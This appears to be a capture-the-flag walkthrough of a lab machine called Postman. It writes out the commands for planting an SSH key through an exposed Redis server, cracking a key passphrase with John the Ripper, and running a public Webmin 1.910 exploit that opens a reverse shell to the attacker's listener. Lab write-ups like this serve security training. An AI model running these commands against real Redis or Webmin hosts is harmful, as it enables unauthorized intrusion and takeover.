NETWORK

ENUMERATION

FOOTHOLD

SSH access as Redis

Let’s generate a ssh public-private key pair on our kali

ssh-keygen -t rsa

let’s write the public key to a file

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > attack_key.txt

Then import the file into redis

cat attack_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key

Save the public key to the authorized_keys file on redis server

redis-cli -h 10.10.10.160
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save

Finally, we can ssh to the redis server with our newly created private key

ssh -i id_rsa [email protected]

Low access as Matt

While on the server, connected as Redis, we have noticed the .bash_history

The .bash_history as a reference to a file id_rsa.bak

A quick research about that file reveals the user Matt’s SSH key

We need a passphrase to use that SSH key

Using ssh2john and john the ripper we are able to find that passphrase

But somehow we are not able to use this SSH key to login via SSH

Instead we can use su to open a session from Redis to Matt directly on the server

PRIV ESCALATION

Webmin access as Matt

The server has an instance of Webmin version 1.910

Matt has access to the Webmin instance

because we have access to Webmin, we can use the following module from Metasploit

but instead we chose to go with the following exploit from Github https://github.com/roughiz/Webmin-1.910-Exploit-Script

Running the following command, gave us a remote shell into the server

python2 webmin_exploit.py --rhost postman.htb --rport 10000 -u Matt -p computer2008 --lhost 10.10.16.9 --lport 9001 -s true